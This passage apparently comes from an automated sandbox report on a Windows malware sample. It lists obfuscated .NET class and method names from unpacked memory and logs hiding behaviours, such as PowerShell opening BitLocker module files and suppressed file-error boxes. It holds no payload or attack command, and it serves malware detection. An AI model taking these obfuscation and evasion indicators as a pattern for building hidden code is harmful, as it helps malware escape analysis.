                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, gNbKl642HtPUg2P0Va.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'rATWX0iYU7', 'nSUWqSTJuQ', 'pxyWzRbX6s', 'h5AoF5UW30', 'PhqoCdO4V3', 'zCEoWPDhVy', 'hx2ooGkrqO', 'B7BaEyWP3YkpuFb9y2I'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, JJIxPVw0LMLjsk6agT.csHigh entropy of concatenated method names: 'PbV9R8Nf2x', 'Pqw9aFGXyf', 'cIP4DVOHLm', 'XyX4GiyWQQ', 'AKe4lnJIrk', 'Ckr4ngZKd7', 'RjZ4BaBjSU', 'Gp54TQBhha', 'hm24LWNHOe', 'giV48ktXOt'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, n2KCHVCoptWusfw8tO2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EDIbOtpESd', 'BBDb7DseIP', 'ee2bQak3eZ', 'x40bcOZVBw', 'rlBbPdfDGj', 'a77biv7f53', 'VJsb0cyPp6'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, tk9aRoBQ3eMemwwyLw.csHigh entropy of concatenated method names: 'ytJvZhcdFm', 'oVmv4r5luZ', 'lidv3mPJMk', 'woN3q6mBgU', 'Qg63ztU7mg', 'vSYvFw50FI', 'zbRvCALemS', 'XbGvWZD1Bw', 'cJCvoQBOp8', 'u1Cvt6bMxM'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, AliLoLd61jlh2dwirr.csHigh entropy of concatenated method names: 'kCD3g8Rwbf', 'TAT3EgqfwJ', 'ae539yZdT2', 'KVV3vZllJA', 'Mm132gnCkE', 'Rxs9PJsHr2', 'ma49iPhKLB', 'sto90yd7gR', 'kEn9JVv3Ex', 'goS9XwqSWb'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, D8Hye1NafRJOAul3SS.csHigh entropy of concatenated method names: 'OSL4629T9g', 'pIj4hc9lgO', 'FHb4Mr5dnb', 'WWi4NHbFI6', 'dUI45eOpSm', 'XTx4Vbg4mj', 'gPi4snExdP', 'l044A8lH6g', 'oMr4k3aAJM', 'Lvw4bdNukd'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, eRx21pzSX9WqnXsfnA.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'woZkjdjO03', 'AVdk5RPoBm', 'f7QkVExkFN', 'yJHksb6vBT', 'XyfkAkU7A9', 'kPDkkVu65a', 'MLXkbp9S6X'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, A4su3Q2v3YqSgfwv5k.csHigh entropy of concatenated method names: 'bOUogT17nT', 'yJVoZtxJOg', 'Y5RoEW0B2k', 'Wtdo4fh4HZ', 'eMGo97hwJj', 'Mmvo3Xuhbu', 'Eukov7cjHH', 'E9fo29Z2Gv', 't5RoHhtnKR', 'qIaoS1s0lp'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, ey2HEXQbLZM9njUQpi.csHigh entropy of concatenated method names: 'ToString', 'RfRVUHNQav', 'x65VyjhyLV', 'qgvVDRyAFM', 'V52VGTkLQC', 'BsLVlLxB5J', 'lSPVn93oJ2', 'vULVBDm594', 'rq3VTS1rRE', 'rhbVL0DUew'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, RIU5D7Xm45cdrVdUeV.csHigh entropy of concatenated method names: 'Lg2AdkbkOf', 'yH7AykbB6Z', 'AWTADUoXx4', 'RPtAGCDKY4', 'gAPAOtaqUv', 'tv8AlZPHie', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, nTXb4SE5RFWy8fQLRZ.csHigh entropy of concatenated method names: 'Dispose', 'GeKCX3shNK', 'rKxWyWZbHB', 'wLx33u2D6j', 'huoCqjDhdK', 'XWqCz5YFu2', 'ProcessDialogKey', 'dw7WFIU5D7', 'n45WCcdrVd', 'OeVWWRRX4x'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, zavugNLx8g08OrRMoc.csHigh entropy of concatenated method names: 'rQovK1UCsj', 'b6gvrG1emW', 'pGfvfjH7iJ', 'UIrv6wc19x', 'Q2WvRqJy8F', 'qS1vhyRMYN', 'waTvabrv5V', 'tSbvMERfFH', 'RRuvNbH8bA', 'sdfvwAZ2TB'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, llnFS0IFR1mB3dQLno.csHigh entropy of concatenated method names: 'S5AjMQSgye', 'fXCjNbJRXr', 'eFNjdgQxJI', 'BZ8jyxDKir', 'ygZjGEMmBn', 'Xwvjl6K9wb', 'MRkjBy1RWj', 'QyMjTJmPu1', 'rKJj82DECM', 'iWmjUsNTCG'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, FjEiYvCFhqjsbZNLe4j.csHigh entropy of concatenated method names: 'HptkKhY3ZQ', 'nOtkrSM4Hp', 'LZPkf8dXuv', 'cxJk66Q78I', 'UXlkRggDCZ', 'GWLkhOtwSh', 'PwMkaLNtjt', 'LiZkMTxdne', 'owFkN06Zfl', 'MaTkw6eSB1'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, VxVIxytamw53sZUY1e.csHigh entropy of concatenated method names: 'UJoCvUumpm', 'clVC2O6pvN', 'PafCSRJOAu', 'J3SCmSGJIx', 's6aC5gT6li', 'NoLCV61jlh', 'YfU5vKMQkDOkeYBrol', 'W7DdDmfm7SEsfbcK3H', 'd58CC2NlEW', 'm8yCo2rcn0'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, XLwmHncMdsN4Xn71aa.csHigh entropy of concatenated method names: 'xa1sSjn6sy', 'w3rsmbkK9u', 'ToString', 'UPnsZa8Vry', 'dkusEYwtYl', 'fONs4Nl74U', 'o2bs96Vrto', 'vSBs3kItE4', 'aGJsvZxm5k', 'mims23d1BP'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, m9XaM7iue6e23TYVVD.csHigh entropy of concatenated method names: 'iOcsJIFuda', 'rDQsqu09pJ', 'BrAAFuwFwE', 'eMBACxk0gh', 'VYOsU9raJN', 'LRas13y5wK', 'CS9sINGKkE', 'C8hsOJaxth', 'nO6s7FYV07', 'LCysQlHV6W'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, tojDhdJKJWq5YFu2tw.csHigh entropy of concatenated method names: 'lr8AZG0W0j', 'qbxAEDqTI7', 'tskA4gxlmg', 'mW0A9g9bDC', 'V1yA3BuatJ', 'nxFAvnJcPC', 'tVgA2KCx3d', 'OuhAHFDYU1', 'bsXASHbIqV', 'tASAmBnmn6'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, BRX4xXq5GbNr2cZufi.csHigh entropy of concatenated method names: 'stKkC00k1Z', 'mUakoGiBVQ', 'Ntnkt7Tar2', 'DxPkZj6eNw', 'fuFkEejHVF', 'Fnfk9Ln2gy', 'z2Fk3EC2vl', 'flWA0pEtfo', 'UTcAJYSbQo', 'yfMAXWNovx'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, Il89MfOJKLE6DrtM41.csHigh entropy of concatenated method names: 'w3c58ZAIZC', 'CiY51QZbNG', 'Ux65OCrLnL', 'r8657vf9dD', 'aW95y2UI0P', 'Ug05DAuph3', 'UBI5GpQ5LP', 'jbk5lKnC0W', 'jR35n56RTX', 'noc5BM04hE'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, Nye9wkW9fpDhCoIAqh.csHigh entropy of concatenated method names: 'hTQfwyxwK', 'WB164cXX2', 'PP2hNlFuc', 'bmcaFQ3a5', 'dQcNathRt', 'wEswW8jgi', 's3WUT00cDA9tS0DiHX', 'htw0eOKDbaTVkfZwL2', 'FMyAY9xmK', 'sQWboRwdX'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, dUumpmMWlVO6pvN5pa.csHigh entropy of concatenated method names: 'jBGEOVUZgP', 'kjuE7NJlBx', 'hITEQx3y2S', 'gQjEcImPZU', 'WQlEPXK8Dg', 'LCuEik0WVF', 'teGE0Ae8hP', 'mQqEJ7eCFB', 'G3yEXbwHuI', 'nAdEq5Hw9m'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, gNbKl642HtPUg2P0Va.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'rATWX0iYU7', 'nSUWqSTJuQ', 'pxyWzRbX6s', 'h5AoF5UW30', 'PhqoCdO4V3', 'zCEoWPDhVy', 'hx2ooGkrqO', 'B7BaEyWP3YkpuFb9y2I'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, JJIxPVw0LMLjsk6agT.csHigh entropy of concatenated method names: 'PbV9R8Nf2x', 'Pqw9aFGXyf', 'cIP4DVOHLm', 'XyX4GiyWQQ', 'AKe4lnJIrk', 'Ckr4ngZKd7', 'RjZ4BaBjSU', 'Gp54TQBhha', 'hm24LWNHOe', 'giV48ktXOt'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, n2KCHVCoptWusfw8tO2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EDIbOtpESd', 'BBDb7DseIP', 'ee2bQak3eZ', 'x40bcOZVBw', 'rlBbPdfDGj', 'a77biv7f53', 'VJsb0cyPp6'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, tk9aRoBQ3eMemwwyLw.csHigh entropy of concatenated method names: 'ytJvZhcdFm', 'oVmv4r5luZ', 'lidv3mPJMk', 'woN3q6mBgU', 'Qg63ztU7mg', 'vSYvFw50FI', 'zbRvCALemS', 'XbGvWZD1Bw', 'cJCvoQBOp8', 'u1Cvt6bMxM'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, AliLoLd61jlh2dwirr.csHigh entropy of concatenated method names: 'kCD3g8Rwbf', 'TAT3EgqfwJ', 'ae539yZdT2', 'KVV3vZllJA', 'Mm132gnCkE', 'Rxs9PJsHr2', 'ma49iPhKLB', 'sto90yd7gR', 'kEn9JVv3Ex', 'goS9XwqSWb'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, D8Hye1NafRJOAul3SS.csHigh entropy of concatenated method names: 'OSL4629T9g', 'pIj4hc9lgO', 'FHb4Mr5dnb', 'WWi4NHbFI6', 'dUI45eOpSm', 'XTx4Vbg4mj', 'gPi4snExdP', 'l044A8lH6g', 'oMr4k3aAJM', 'Lvw4bdNukd'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, eRx21pzSX9WqnXsfnA.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'woZkjdjO03', 'AVdk5RPoBm', 'f7QkVExkFN', 'yJHksb6vBT', 'XyfkAkU7A9', 'kPDkkVu65a', 'MLXkbp9S6X'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, A4su3Q2v3YqSgfwv5k.csHigh entropy of concatenated method names: 'bOUogT17nT', 'yJVoZtxJOg', 'Y5RoEW0B2k', 'Wtdo4fh4HZ', 'eMGo97hwJj', 'Mmvo3Xuhbu', 'Eukov7cjHH', 'E9fo29Z2Gv', 't5RoHhtnKR', 'qIaoS1s0lp'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, ey2HEXQbLZM9njUQpi.csHigh entropy of concatenated method names: 'ToString', 'RfRVUHNQav', 'x65VyjhyLV', 'qgvVDRyAFM', 'V52VGTkLQC', 'BsLVlLxB5J', 'lSPVn93oJ2', 'vULVBDm594', 'rq3VTS1rRE', 'rhbVL0DUew'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, RIU5D7Xm45cdrVdUeV.csHigh entropy of concatenated method names: 'Lg2AdkbkOf', 'yH7AykbB6Z', 'AWTADUoXx4', 'RPtAGCDKY4', 'gAPAOtaqUv', 'tv8AlZPHie', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, nTXb4SE5RFWy8fQLRZ.csHigh entropy of concatenated method names: 'Dispose', 'GeKCX3shNK', 'rKxWyWZbHB', 'wLx33u2D6j', 'huoCqjDhdK', 'XWqCz5YFu2', 'ProcessDialogKey', 'dw7WFIU5D7', 'n45WCcdrVd', 'OeVWWRRX4x'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, zavugNLx8g08OrRMoc.csHigh entropy of concatenated method names: 'rQovK1UCsj', 'b6gvrG1emW', 'pGfvfjH7iJ', 'UIrv6wc19x', 'Q2WvRqJy8F', 'qS1vhyRMYN', 'waTvabrv5V', 'tSbvMERfFH', 'RRuvNbH8bA', 'sdfvwAZ2TB'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, llnFS0IFR1mB3dQLno.csHigh entropy of concatenated method names: 'S5AjMQSgye', 'fXCjNbJRXr', 'eFNjdgQxJI', 'BZ8jyxDKir', 'ygZjGEMmBn', 'Xwvjl6K9wb', 'MRkjBy1RWj', 'QyMjTJmPu1', 'rKJj82DECM', 'iWmjUsNTCG'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, FjEiYvCFhqjsbZNLe4j.csHigh entropy of concatenated method names: 'HptkKhY3ZQ', 'nOtkrSM4Hp', 'LZPkf8dXuv', 'cxJk66Q78I', 'UXlkRggDCZ', 'GWLkhOtwSh', 'PwMkaLNtjt', 'LiZkMTxdne', 'owFkN06Zfl', 'MaTkw6eSB1'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, VxVIxytamw53sZUY1e.csHigh entropy of concatenated method names: 'UJoCvUumpm', 'clVC2O6pvN', 'PafCSRJOAu', 'J3SCmSGJIx', 's6aC5gT6li', 'NoLCV61jlh', 'YfU5vKMQkDOkeYBrol', 'W7DdDmfm7SEsfbcK3H', 'd58CC2NlEW', 'm8yCo2rcn0'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, XLwmHncMdsN4Xn71aa.csHigh entropy of concatenated method names: 'xa1sSjn6sy', 'w3rsmbkK9u', 'ToString', 'UPnsZa8Vry', 'dkusEYwtYl', 'fONs4Nl74U', 'o2bs96Vrto', 'vSBs3kItE4', 'aGJsvZxm5k', 'mims23d1BP'
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, m9XaM7iue6e23TYVVD.csHigh entropy of concatenated method names: 'iOcsJIFuda', 'rDQsqu09pJ', 'BrAAFuwFwE', 'eMBACxk0gh', 'VYOsU9raJN', 'LRas13y5wK', 'CS9sINGKkE', 'C8hsOJaxth', 'nO6s7FYV07', 'LCysQlHV6W'

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
